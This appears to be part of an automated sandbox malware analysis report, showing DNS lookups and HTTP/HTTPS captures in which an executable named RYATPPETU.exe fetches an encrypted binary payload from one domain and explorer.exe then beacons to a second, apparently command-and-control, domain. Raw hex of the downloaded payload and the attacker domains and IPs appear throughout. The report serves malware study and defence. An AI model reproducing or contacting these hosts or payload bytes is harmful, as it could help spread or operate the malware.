Oct 27, 2021 20:18:51.221848965 CEST	61733	53	192.168.2.5	8.8.8.8
Oct 27, 2021 20:18:51.257683992 CEST	53	61733	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 27, 2021 20:17:09.543685913 CEST	192.168.2.5	8.8.8.8	0xb278	Standard query (0)	blumeconstructionllc.com	A (IP address)	IN (0x0001)
Oct 27, 2021 20:18:28.939344883 CEST	192.168.2.5	8.8.8.8	0x1a02	Standard query (0)	www.etr6safvu8.com	A (IP address)	IN (0x0001)
Oct 27, 2021 20:18:51.221848965 CEST	192.168.2.5	8.8.8.8	0x4aa6	Standard query (0)	www.lrbounee.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 27, 2021 20:17:09.564801931 CEST	8.8.8.8	192.168.2.5	0xb278	No error (0)	blumeconstructionllc.com		45.82.177.176	A (IP address)	IN (0x0001)
Oct 27, 2021 20:18:28.969048023 CEST	8.8.8.8	192.168.2.5	0x1a02	Name error (3)	www.etr6safvu8.com	none	none	A (IP address)	IN (0x0001)
Oct 27, 2021 20:18:51.257683992 CEST	8.8.8.8	192.168.2.5	0x4aa6	No error (0)	www.lrbounee.xyz		172.67.161.80	A (IP address)	IN (0x0001)
Oct 27, 2021 20:18:51.257683992 CEST	8.8.8.8	192.168.2.5	0x4aa6	No error (0)	www.lrbounee.xyz		104.21.9.197	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

blumeconstructionllc.com

www.lrbounee.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49697	45.82.177.176	443	C:\Users\user\Desktop\RYATPPETU.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49698	172.67.161.80	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 20:18:51.283169985 CEST	324	OUT	GET /kb8y/?UL30vp=VG0y4HVkQ1AGt1voBcUsNCEJrT9SlfHUi22gJvk+aIOz4uPxc1TzHkPIPjpZ8++2gXXO&4hP=NPuDZXp0DVz HTTP/1.1 Host: www.lrbounee.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 20:18:51.616200924 CEST	325	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Oct 2021 18:18:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qqJ2Q9iCH1RRBQKJHt7%2Bpll1gj8DBHVrUY1%2ByxZfQWtFIoZbTjROcASUpSCa3xt1a89lPkmS%2FOwrIt5r%2Btdm6auT0AZrk%2Fg7h%2BdIwpX%2BPk3RXDFVKvodDvIcTZiBaHT4Vg1K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a4dede68e4e4ee6-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 39 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 9f<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.15.8.3</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49697	45.82.177.176	443	C:\Users\user\Desktop\RYATPPETU.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-27 18:17:10 UTC	0	OUT	GET /bin_NXOEaeagUq10.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: blumeconstructionllc.com Cache-Control: no-cache
2021-10-27 18:17:10 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 27 Oct 2021 18:17:10 GMT Server: Apache Last-Modified: Wed, 27 Oct 2021 13:12:19 GMT Accept-Ranges: bytes Content-Length: 189504 Connection: close Content-Type: application/octet-stream
2021-10-27 18:17:10 UTC	0	IN	Data Raw: 98 c5 fe 81 1d 0e 9b bf b8 3f 56 11 88 03 f6 a9 8e 63 9c bd 9d 00 68 f2 3b 50 5f 32 bf 2b 58 03 76 d7 fd 61 4c 08 75 79 20 83 05 b3 4c 30 da 22 28 66 be 26 5e 7c 5e 92 5d fa 6b b9 65 fd bc bd 20 d1 08 c3 c9 13 30 f2 3b f6 69 06 19 71 17 cb 0f 58 ea f5 48 90 54 be 6f 87 a9 af 44 cf b8 6b eb a2 dd e8 55 ec 32 76 53 02 1b 3e 44 6f 21 95 04 4a 69 98 ee 15 06 d3 eb d6 09 d6 a8 38 b1 61 40 1a a2 25 cd 61 cc 21 ed af b9 9b e8 7c c3 c4 fa 52 a5 dd 86 50 e5 7b 21 21 70 0c 42 c4 6e b6 84 67 93 e7 c1 ed 6f 68 a6 8a 5f 49 d7 64 17 3c 37 30 ce 98 42 13 1f 9d c5 4d 91 11 d1 a9 58 f0 1f 42 87 f1 73 f7 54 c1 f3 5e f7 9a 0d 4d 9a d6 83 bb 38 fc f1 eb b1 95 37 6a c2 c2 d9 08 0b fc 8e 44 b2 61 c8 9b 8b ca 56 6f 53 11 b3 f4 5c 32 79 bc d8 3e e1 1f 0d 22 04 6b 0a 8b 3d f4 28 Data Ascii: ?Vch;P_2+XvaLuy L0"(f&^\|^]ke 0;iqXHToDkU2vS>Do!Ji8a@%a!\|RP{!!pBngoh_Id<70BMXBsT^M87jDaVoS\2y>"k=(
2021-10-27 18:17:10 UTC	8	IN	Data Raw: 96 89 b3 30 5a a9 13 83 4c fb e5 2a 9b 02 b1 7a a8 ab fa 3b 69 7b b9 b8 f3 3b 1b 26 89 78 88 e7 31 ff b9 f5 38 93 8d 45 9a af 0f ff 55 b5 31 07 32 41 32 43 4b 6d 9c 89 a4 95 df 0f 06 d5 13 8a f8 78 d0 88 1f 83 b4 26 2c b9 e3 ca d3 77 b4 26 f2 28 21 ac f3 fd 8f 7d be cc b8 61 b5 68 14 94 60 3c 91 f0 20 59 7e c5 19 cd b9 1f b0 91 91 17 02 64 0c 05 e2 15 c4 07 89 09 cd 85 7f 8b d8 96 26 3d 04 78 0c a6 a7 09 4f 79 d3 bc 3a 9b a7 af 2c b5 b2 4c 8e b9 5e 77 40 93 fc 6f ec ad 0c e5 85 97 12 30 bd 90 6b 0f a0 24 7b fa ab 60 d5 6d 97 54 c7 f2 de 2b 08 a4 aa 06 28 2e 66 10 4b 24 94 1c 3a b3 4e 85 02 f2 45 71 b6 38 97 be 24 37 2b 01 65 1a 27 48 9d 52 3b f8 1c 6a c5 30 23 eb ae 0c 85 39 40 d3 0e a7 c7 56 30 21 0a b8 be 44 59 9f 75 3a 29 e0 5e 26 ef 20 92 eb f9 46 c1 Data Ascii: 0ZL*z;i{;&x18EU12A2CKmx&,w&(!}ah`< Y~d&=xOy:,L^w@o0k${`mT+(.fK$:NEq8$7+e'HR;j0#9@V0!DYu:)^& F
2021-10-27 18:17:10 UTC	15	IN	Data Raw: db 48 5a b9 ca a4 9b c8 b8 55 5a f5 43 56 9e d9 5f bb 50 6d c6 3c c9 52 66 bf 32 82 03 94 1d 3d 0f f7 60 48 a6 e9 c5 69 2a 93 e6 9a 2b 87 93 05 b7 05 54 35 81 cf 53 68 2c 37 6e f3 54 c3 3c 4a b4 ce 87 39 d2 78 28 47 90 cb 70 82 b0 fe 7a 16 1b c6 bf fc 63 f9 42 64 46 97 b9 b0 b6 54 7b 36 3a 7d 5e a9 02 be 6a bd 3a 42 fc 72 f6 67 f0 d1 b5 59 02 07 7e d5 a6 b6 30 d1 c6 3b 42 8a c7 3d 66 61 1d cf dc ac 1e 48 b8 5f bd 98 6c 05 1c b5 72 89 ed 9f e6 bb 7a fa 4b 80 68 07 0c e0 d8 93 66 e4 49 56 4a 25 60 d9 c2 4e c3 41 4a 6a 64 fc fc c2 23 74 11 d8 aa 25 29 51 5f 22 3b 63 60 f3 20 13 b3 36 27 2b 2a 9b 51 71 5a 30 34 9b 9e 78 c7 54 a7 85 b8 7b f0 03 4d fd 39 6a eb 2f 49 d0 cd a8 32 76 d0 c6 1f 6c ac 0d a4 94 04 c1 ec e0 15 ea f9 5e 67 d3 79 2d 97 c7 e0 ec db 7d e5 Data Ascii: HZUZCV_Pm<Rf2=`Hi+T5Sh,7nT<J9x(GpzcBdFT{6:}^j:BrgY~0;B=faH_lrzKhfIVJ%`NAJjd#t%)Q_";c` 6'+QqZ04xT{M9j/I2vl^gy-}
2021-10-27 18:17:10 UTC	23	IN	Data Raw: 0b fa e8 e2 16 2d 01 25 41 d0 06 8f ba 47 9e d0 d6 d7 a6 e0 19 69 28 f2 04 0f 6e ac 4a 39 43 11 c4 75 a9 31 3e 84 2b dc 85 85 42 b0 2e 5b 8b ca 78 ab bf 7b 4f fc 28 f5 fb 6f ed 06 65 1c aa 60 e2 4a 7d 5a 0a 38 c0 9d 61 7c 16 d0 32 0f 94 3b 63 25 c8 e7 62 ce 10 8b 32 25 1f bf 06 bd fa c1 23 63 e3 59 a3 dd 96 ad 38 64 fd 71 1c a4 72 bc 79 c9 cc 46 47 7c 25 bb d5 a2 fd cc 9a 0a 2c 39 36 4f 99 11 9f 6a 50 f0 00 54 1d 4c 15 a8 07 25 e2 87 52 d0 0c 4f d4 db d5 65 eb b2 fe be 44 72 22 02 f9 ae 4d 04 f9 90 14 a9 2c fd 78 d0 21 8b d8 e6 29 34 87 2e c2 99 93 ca 28 84 f5 c6 55 1b 7a c5 49 81 3a 88 cb 80 e8 3e 14 f5 e9 ae 16 cb 24 6a 8c 03 8d 65 2e 32 7a 58 15 ba 84 e1 b7 ec 49 f3 59 1e 14 ae 0e 14 36 ce a0 58 50 14 02 d8 e0 41 56 2a e3 aa 3f b9 7f f6 ad cb 60 7e ad Data Ascii: -%AGi(nJ9Cu1>+B.[x{O(oe`J}Z8a\|2;c%b2%#cY8dqryFG\|%,96OjPTL%ROeDr"M,x!)4.(UzI:>$je.2zXIY6XPAV*?`~
2021-10-27 18:17:10 UTC	31	IN	Data Raw: a2 d7 12 5b 2d 29 5a 30 2c 95 41 9e 1b 13 11 31 13 0a 68 ea 7c f7 b0 af 87 6e c3 46 14 8d 4c b0 34 02 2d d5 38 7f aa 43 3e 58 a6 42 72 2f d3 95 7e c0 2d 1c a2 e6 1b b7 64 ff 6b 29 cf 17 ac ad 8c 0f 40 b1 1c 0c 11 a5 c9 4f a9 be 16 3a f4 73 8a 9d 13 bf 84 46 ac 0f 91 e0 5c 2b c7 b2 48 9d 88 41 48 25 ba b5 33 d3 b8 ef e8 e0 16 7f b6 d3 a9 ee 22 85 5c 5d eb ca 7d fc fe 66 29 8d 8d 1d 99 23 aa 75 51 2c 99 bb e7 de 78 3b 3e ec 12 5d cf 79 4a 21 49 b8 ee 08 8f db c2 3c 9e 8f 0b 01 39 f6 e6 3d a5 28 43 03 0d ba 8a 13 67 fe 8c 3d 7e a7 7c 81 de c6 e9 c0 6b 38 90 7f 3b 8c 6a de 48 5c 6e 24 fa 9d 3b fe 29 06 5f ed da 17 fb 05 ea 1b 1b 7d 37 fd 09 07 1b b5 c8 47 46 8c 07 e0 b7 c0 bc 2c 4a ce 68 b0 65 30 f0 96 7b a2 7c 8d 07 c2 c6 12 96 f4 80 1c a1 48 b8 72 53 67 93 Data Ascii: [-)Z0,A1h\|nFL4-8C>XBr/~-dk)@O:sF\+HAH%3"\]}f)#uQ,x;>]yJ!I<9=(Cg=~\|k8;jH\n$;)_}7GF,Jhe0{\|HrSg
2021-10-27 18:17:10 UTC	39	IN	Data Raw: bc 45 b5 d3 62 5f 06 56 6e 41 28 68 93 a8 80 10 07 9c 8f b7 a3 4c d5 77 39 5b 8c 22 f1 17 be a5 3f 52 04 5e 90 e1 7f 70 4c 92 79 53 53 d0 fc 3f 9f f1 ef 44 58 f5 13 20 9e a9 ec 00 29 2c b8 10 f1 a8 1a 8e ad 73 e5 24 89 78 18 f4 1a 2d 6d db f4 e2 c4 6d 09 49 14 23 04 e2 8c 2b 36 f4 28 32 ea bc 94 ae 89 f9 7d 4e ed bb cc 5d 41 6d a7 0f 4e 78 93 b2 c7 04 0d 3f 48 b7 c6 54 d6 e6 17 a8 ba c9 dc a8 18 a1 e5 ec 66 2b 90 7f 3d 87 54 09 08 71 3e 71 43 a6 95 18 64 fc af ef ba fe 02 d7 82 b4 86 5e 8b 68 2a 5c 52 88 1c 96 3b 74 bb e3 e3 32 70 8c ad 23 cd b1 52 6c ae f4 88 c7 17 5a ae 77 4b 0b dc e6 a4 a3 46 df 26 37 c1 41 d6 b8 46 44 2b 73 5c 29 8e 97 bf 4f 46 46 88 1e 86 25 4a c0 82 b9 67 19 55 43 44 34 f9 41 be c9 b9 19 c0 83 9b 07 b4 8e 56 2b 2a 33 68 18 e7 a2 65 Data Ascii: Eb_VnA(hLw9["?R^pLySS?DX ),s$x-mmI#+6(2}N]AmNx?HTf+=Tq>qCd^h\R;t2p#RlZwKF&7AFD+s\)OFF%JgUCD4AV+3he
2021-10-27 18:17:10 UTC	47	IN	Data Raw: 5f ab ec ce cd 97 2c c5 9f af b9 48 c7 97 40 a9 d8 80 b2 e8 e4 51 c7 39 2e d9 fd da ef 3f cf b6 14 91 e7 1d fc c1 60 9b 59 bb 69 10 6f 99 12 4d d7 c1 61 d8 92 ed 8f 9d a9 d7 5a 8d d1 1e d3 e0 1a a7 69 41 00 0b a4 b7 d9 1f c4 03 b0 b3 3b a3 c3 a2 66 70 9c 0b 5f 9a b4 b2 f1 07 be 30 46 10 28 79 37 30 d8 55 d1 a8 8b 2e d2 41 3f 44 9c 18 67 f2 95 f5 47 94 7e 95 10 7f 48 c6 88 4c 11 c9 cd b3 03 5a c6 c1 73 e6 73 f9 a0 8e be 88 72 b6 29 1f 64 d0 4a ec c9 04 05 9a 10 21 af 51 0b ca a3 96 ff 19 e7 c5 14 41 bd 29 fa 80 81 cd 27 54 ec df cd 49 26 3a 25 e2 c4 cd e4 93 7d b8 2d 9e 10 4a 39 df df b9 9b be 30 fe 6c 7b 84 c3 d1 06 41 9a 1f 46 82 89 75 bb ea e5 a2 39 6f 0c 13 3a e9 27 a5 1e a3 67 93 cc 06 50 b0 05 52 49 80 cf 55 48 90 0f f3 c5 3e 26 e3 36 8f 51 5c 93 f6 Data Ascii: _,H@Q9.?`YioMaZiA;fp_0F(y70U.A?DgG~HLZssr)dJ!QA)'TI&:%}-J90l{AFu9o:'gPRIUH>&6Q\
2021-10-27 18:17:10 UTC	55	IN	Data Raw: b1 21 13 66 1a 6d 4b ea ee 93 3e d7 7b 06 e1 a1 fa de 90 5e f8 af 83 a1 50 fa 01 33 aa 60 47 80 2b 6b e2 e4 b7 35 b5 ae e4 7a 65 4b 65 9e 10 3c 13 02 94 ea 8f e9 d6 09 80 5b f8 d9 67 4c 05 18 7b 40 58 63 11 33 e8 e9 b1 ac d8 33 51 6c de 6d 36 17 3f 82 e1 f5 5a 51 6f 73 42 20 30 f0 47 7a f7 e9 1c de 16 0f 65 e5 7b 92 2b ac b6 a0 5f aa 76 2c 1d 97 57 ee c9 ee 12 d1 a9 65 78 3c 36 07 14 18 1e 31 78 1c 94 fb 1c b4 59 7a b7 70 bb f5 c8 e6 e2 db 2c c3 82 be 09 35 95 e6 d3 de 48 49 d8 76 6c ed 19 04 54 67 91 6e 1a 3a 8b 13 fc 8e b7 67 af 01 22 04 83 6e f9 3d f4 78 ee e1 5e dc fe da 7b 38 3d ec eb 10 fb 57 49 2a 59 75 6e f6 f3 12 39 8f 2b 42 5f 82 ce f9 ff 9d 26 95 8b d8 2b 5f 41 96 74 53 a2 74 67 66 d0 bc b8 21 2c fd ab b2 2b e0 50 76 39 91 3f 8c 96 33 3e 05 58 Data Ascii: !fmK>{^P3`G+k5zeKe<[gL{@Xc33Qlm6?ZQosB 0Gze{+_v,Wex<61xYzp,5HIvlTgn:g"n=x^{8=WI*Yun9+B_&+_AtStgf!,+Pv9?3>X
2021-10-27 18:17:10 UTC	62	IN	Data Raw: 56 f6 3e 97 81 35 0c 9d 3f 08 77 97 8b dd fd 94 d0 08 23 8c 03 e8 de 7a b7 57 a7 69 3a c6 e1 e8 ae 03 df a6 e1 68 d1 b6 97 fd 4a 65 d5 dd 38 ab ac 6a 23 3a 7b 61 aa bc ef 97 99 d3 e7 9f 02 96 bf 42 51 14 a0 cc 92 13 f8 fb d7 5b fa f9 46 79 84 fb 5e d5 f7 33 3a 3e 71 d8 cb 95 a5 da 3b b0 a2 50 c3 2c c5 f4 09 9b c0 81 5a b5 6a 44 9e 0f ac e8 5d 77 4e c3 26 8d df 04 52 09 9a 10 38 97 1e 14 ed 5e 17 1c 94 f9 9f 71 5c d5 be c7 f3 61 8a c5 53 ff 1a 33 28 28 91 49 12 b8 e1 23 4f fd af 36 0a a7 f4 49 90 03 7e 3e 07 2d f0 91 1a 49 e5 74 2d 93 e8 0e d5 dc a4 d5 d5 50 95 d7 5b 7e b2 92 fc d1 40 15 97 d7 4b bc 84 cf 1f 02 41 62 e2 47 17 eb fa 1d c8 f1 5d 77 b3 92 53 5e dd 23 69 18 61 34 38 47 72 2f d3 95 68 44 ed 48 e6 f1 59 f6 e0 b3 70 10 9a 10 25 cb c7 8b e8 3b 69 Data Ascii: V>5?w#zWi:hJe8j#:{aBQ[Fy^3:>q;P,ZjD]wN&R8^q\aS3((I#O6I~>-It-P[~@KAbG]wS^#ia48Gr/hDHYp%;i
2021-10-27 18:17:10 UTC	70	IN	Data Raw: 84 a8 02 59 d8 c8 91 0c 69 f9 75 19 f5 61 b5 b1 0b c4 f7 90 b5 7a cd 1b 23 4b 28 7b 77 3e a6 6d 94 e0 44 49 8a 4a 4d a0 cf 4c 4b 18 fc dd dd fb 2d 92 b7 1a 6d 11 88 0d ed 8c 35 3f a2 03 fa c0 6f 03 a6 fa 66 84 a7 d9 3c c3 8e 2e b8 91 e1 9e dc 8b 2b b2 26 fd d4 0b 8a 75 65 76 b2 6e 7d 41 bd 77 33 53 15 11 40 12 5c e0 cf 64 ec 78 43 ac 28 81 16 09 f6 4c f7 b7 3b f8 14 5d 5e 2c 4d 65 31 f3 93 0d 9f 7f 46 6f 21 a6 c4 22 fd 99 ee 15 56 5a 6e db f7 29 97 b1 34 70 b0 fa e7 a2 48 c0 3b 13 33 71 31 52 3c a3 68 53 1b a4 9e 53 0b c0 0f 8c 5c b2 af 90 73 6c 85 d5 0e b8 0e 82 09 33 be 06 86 68 7c 79 c2 a6 d1 10 a4 a0 55 af 3b f6 a9 60 1e b2 12 d5 c9 2c 98 ff 30 55 8e 1b 9c e1 77 68 4c 90 c6 cb 57 bd fc 6f 1d f6 a2 ad f5 45 d7 2c 48 27 96 2b 5f 95 07 45 2b c9 1e c4 74 Data Ascii: Yiuaz#K({w>mDIJMLK-m5?of<.+&uevn}Aw3S@\dxC(L;]^,Me1Fo!"VZn)4pH;3q1R<hSS\sl3h\|yU;`,0UwhLWoE,H'+_E+t
2021-10-27 18:17:10 UTC	78	IN	Data Raw: 59 66 a2 63 d9 5c d4 64 7e df 0c 9d 31 6a 35 54 8d cd d0 2f 79 53 b6 24 d7 41 54 0e 51 ee 1e b7 10 4a c0 5f e6 00 08 54 43 91 37 72 cc 74 bd b4 ba 8e 87 aa 61 7e 02 56 2b 67 ad d6 5a 49 c9 1c 16 dd a0 d2 46 bc 88 af 90 7f b8 fb 80 55 26 06 fc 30 8a fc 49 e4 f5 44 1a 91 8d 8b d8 12 2b b8 f7 69 73 0d 4b 3f 62 77 7e e0 bf aa 73 fa d5 23 8c 80 46 c9 72 f2 0f 41 c6 af b8 b7 ef 80 1b e2 59 1e 14 15 4e 4b 67 f2 64 58 50 14 0f d8 70 14 ff 75 d7 8c ac b4 1c f1 1b 08 7a 08 cb e3 12 5b 83 1f a7 8b d9 34 c4 07 14 bb 74 d0 fd 75 7b d5 83 fb 68 d8 38 ca 82 b1 1c 8a 53 e2 a6 c7 e3 d2 bd 4c 32 58 06 0c 5e 97 75 37 b9 a9 25 8f 6d 9d 12 b2 83 08 42 9e 23 dc 8b 0c 9d 5d 43 97 51 5f df df 85 b1 ec f4 b6 51 6e f0 84 2f e8 cf 37 dd ee 9c c5 a1 e0 b4 9c 43 07 68 35 65 e7 e0 73 Data Ascii: Yfc\d~1j5T/yS$ATQJ_TC7rta~V+gZIFU&0ID+isK?bw~s#FrAYNKgdXPpuz[4tu{h8SL2X^u7%mB#]CQ_Qn/7Ch5es
2021-10-27 18:17:10 UTC	86	IN	Data Raw: 23 f1 c0 b8 33 50 bf 99 3d a7 a4 dc bd d7 f2 b1 08 43 3a be 0c fb 15 89 d3 99 18 ff 06 e4 c2 eb 7a 8a 10 b3 92 f7 e2 df f3 6b 57 a4 e1 e7 40 d3 9f 36 04 fe 65 86 10 d1 c6 bf 0d 7c 59 82 fc d9 aa 33 78 25 1b 3e ce 2c 74 c1 cc 8e 94 b6 f2 e8 01 c2 aa 49 72 cd 49 36 d5 73 0e d6 ba 75 b1 00 61 b7 ad cc db 03 f9 a4 d9 b4 5a ba d2 56 62 b2 9c 52 3d f0 25 37 1d 92 db 2f cf c3 07 94 09 46 c6 84 8e a2 dc 37 17 47 af bd c1 c7 59 63 3b dd 98 d2 65 a7 98 e3 93 43 85 4d 5c a4 c8 c6 02 2f 32 17 08 9a 5f cb 4d 4a 95 16 86 05 7c 20 00 34 a6 20 be 67 98 02 1a 69 06 00 6d 70 41 d8 5f 5e ae ea 6d 16 fe 5c 8c c3 e7 66 f7 10 0e 89 f5 a2 d9 62 6c ce 2a f0 e0 96 ba 56 ef 56 a9 22 fd 26 16 14 88 0c 69 aa 83 8f 17 65 f2 ea 96 c6 d1 bb d5 da 84 e1 75 49 89 3a 60 18 2b 4e d3 c1 67 Data Ascii: #3P=C:zkW@6e\|Y3x%>,tIrI6suaZVbR=%7/F7GYc;eCM\/2_MJ\| 4 gimpA_^m\fbl*VV"&ieuI:`+Ng
2021-10-27 18:17:10 UTC	94	IN	Data Raw: 3a a9 5e 52 eb 87 34 46 3d 5f 94 87 ea 50 e5 74 18 86 20 ca 0f 6b 10 55 df 99 52 54 94 46 02 92 20 0c 32 68 a7 30 f6 29 5c 39 3d b4 83 fc c9 8c da 53 fd 5f 2e d1 d4 f4 fb fe 05 3d 1d 5c 85 e5 a2 5c d2 af 30 7b 12 8f 03 81 f5 32 97 1a cc b4 9d 59 e4 45 1c 63 2b a1 63 07 ad c8 dc 1c 68 05 f7 e5 08 d5 cc a4 f1 92 8e 68 20 d6 7e 5a fe 6c d8 54 59 3d 2d bf 2e 2e 8b a5 63 b0 9d 07 c4 86 a8 18 bc 0d 7e 27 1c 26 c9 0a 1f c6 2d cb 8b 39 29 42 a4 b4 c7 2f 90 71 20 8f ca 81 d3 c9 f4 8a 16 46 18 23 93 0f 8f d0 7d 72 91 b5 b6 1d 78 f4 66 ab db 89 04 a6 e8 fc 97 41 f7 0d af 02 75 ea e5 34 72 64 46 a2 43 14 26 83 6f 21 7a ae 8a 91 ce f4 e6 62 ee ad c8 5c 8b 0a 57 40 34 bc 1f b8 43 19 23 7d 74 03 e7 08 b2 07 ee 1b 9d bc 60 e2 8e 2f 4d 10 2c ec 57 0f a5 2d 8b 70 57 83 9f Data Ascii: :^R4F=_Pt kURTF 2h0)\9=S_.=\\0{2YEc+chh ~ZlTY=-..c~'&-9)B/q F#}rxfAu4rdFC&o!zb\W@4C#}t`/M,W-pW
2021-10-27 18:17:10 UTC	101	IN	Data Raw: 16 0d 30 a7 66 bf 61 72 93 16 35 02 2a 48 ea 7c 49 68 f0 6b d0 41 82 d7 23 1f 20 3a 14 b5 d5 38 7e 42 3a 89 f8 07 73 bd 9d 07 d0 36 44 b7 29 74 cf 65 e5 9e 35 f5 45 13 96 b3 f8 07 e3 fe 67 de ff 65 aa 5b 86 a9 be 93 77 06 ca 09 23 0b 31 40 5e 17 03 f9 63 e2 1e 8e ba c5 06 fc 1e cb 9b f5 ef db ea 0f 64 41 e8 e5 57 32 d2 ea 6d 97 cc 5c 27 c7 4e 30 f4 7f e9 be e7 8d e2 3f 44 00 49 3a 4f 05 14 15 21 12 25 03 68 6b b5 46 81 cf 36 31 2f 9a 79 f9 9c 95 b5 4f 4c d8 84 f9 6a 0b db 0c 3f 2c b6 a5 cc 87 c5 45 f3 8c d5 0d d5 8b 29 4b 58 35 cf c9 71 92 7f 64 3a d5 97 57 fd 59 93 12 4d 3b 4b fb 27 df 58 05 03 a6 af 0b 82 c7 b1 b9 31 73 2e 1b 28 4d 71 c1 59 6d e2 dd c9 42 57 48 ba 5f d8 a5 aa 0f 1c c9 e6 44 ca 70 e0 64 14 ba d8 80 68 6c 6f 76 a2 ac 78 98 4d 85 fe 75 eb Data Ascii: 0far5*H\|IhkA# :8~B:s6D)te5Ege[w#1@^cdAW2m\'N0?DI:O!%hkF61/yOLj?,E)KX5qd:WYM;K'X1s.(MqYmBWH_DpdhlovxMu
2021-10-27 18:17:10 UTC	109	IN	Data Raw: 9f 1a 06 0d a6 c9 e2 d3 27 cd 59 a6 d4 d7 f5 e7 6b ee 12 1e 39 b0 92 af b1 58 84 af 33 c6 1b 17 3c 02 2f 4e 2b 57 34 e2 d0 7f ab 7f 3e 35 30 57 fd e1 15 85 72 4f 93 6a a6 ad 1b f1 a1 14 1b ad 40 dd 2c 5a 8d d5 24 9f 63 15 b2 22 9f a0 df b4 94 e1 a9 41 67 81 c6 35 a4 79 8d e7 04 2f 01 59 d5 30 d2 2c cf 42 90 85 1e 77 9a 2c ea fd b9 c1 06 6f aa ae db c7 bc f9 97 15 a9 31 87 55 ae 49 7b 29 db 53 a2 4e a1 b2 13 aa a8 ac 2c 15 b5 7e 3f 63 65 8b 39 fb 32 dd 92 20 16 f7 a7 2f 87 16 6b 74 9b 54 fa a6 f1 94 74 e4 e4 1d cd ad 48 fb 59 35 24 32 39 36 25 a4 4c 6b e2 59 7f ce e6 89 3c 2e 08 e5 e3 43 2a a5 ef a4 10 d2 b9 d4 8c 39 bb 1c 15 24 ec 30 ff 37 bb 33 18 cf 54 2c ae 0f 50 05 ab 1f 06 0b 3b fd 79 f4 19 6b da 69 45 4d 01 ba a8 00 7d 3f b8 a9 4a d8 06 6b 98 e3 cf Data Ascii: 'Yk9X3</N+W4>50WrOj@,Z$c"Ag5y/Y0,Bw,o1UI{)SN,~?ce92 /ktTtHY5$296%LkY<.C*9$073T,P;ykiEM}?Jk
2021-10-27 18:17:10 UTC	117	IN	Data Raw: 7f a6 48 89 32 0c 8d c3 7f 68 29 f4 e8 47 79 74 30 b7 3a c6 af 93 18 66 51 ea 88 fc 87 1a e0 eb 04 92 9e 01 bb 6d 16 bc d0 80 bb e5 c1 f1 1a 95 30 a3 b9 63 c0 63 1d ea f9 3a 25 74 c6 d9 ea f2 0e 67 a4 89 45 1f 6b 6b 84 c1 ab 93 79 71 02 78 a4 81 41 4f b2 c8 d7 2d 7d 1a b1 df 86 6d 7e cc b6 95 64 92 93 97 65 a4 0d da 6c fa f7 e5 c6 5b 1d 6b e6 52 1c 0d 78 73 3a d6 29 c9 b3 3a 8e 4b b7 43 dc 01 11 b0 8e 56 8a c7 77 2b 15 e0 f6 1e 39 d4 4f 47 11 fc 23 3b 97 73 9d 7e 4d 1c 19 c3 dc c7 69 cb 92 39 d8 89 ec 7e 88 5e 8c 16 27 3f dd 6f 6b d3 ef b6 c3 d9 d8 0e 42 df 82 b0 b8 97 9c 8f 37 27 8c 53 30 97 8d f6 df 8c fb f3 44 83 59 e0 77 56 49 f3 06 a6 6d 86 e3 45 49 bf 94 e7 ce da f1 28 70 c1 66 c9 60 89 46 9a 19 84 8d 96 93 d6 c2 bf 09 72 53 c0 dd 86 ad e6 0c 95 cd Data Ascii: H2h)Gyt0:fQm0cc:%tgEkkyqxAO-}m~del[kRxs:):KCVw+9OG#;s~Mi9~^'?okB7'S0DYwVImEI(pf`FrS
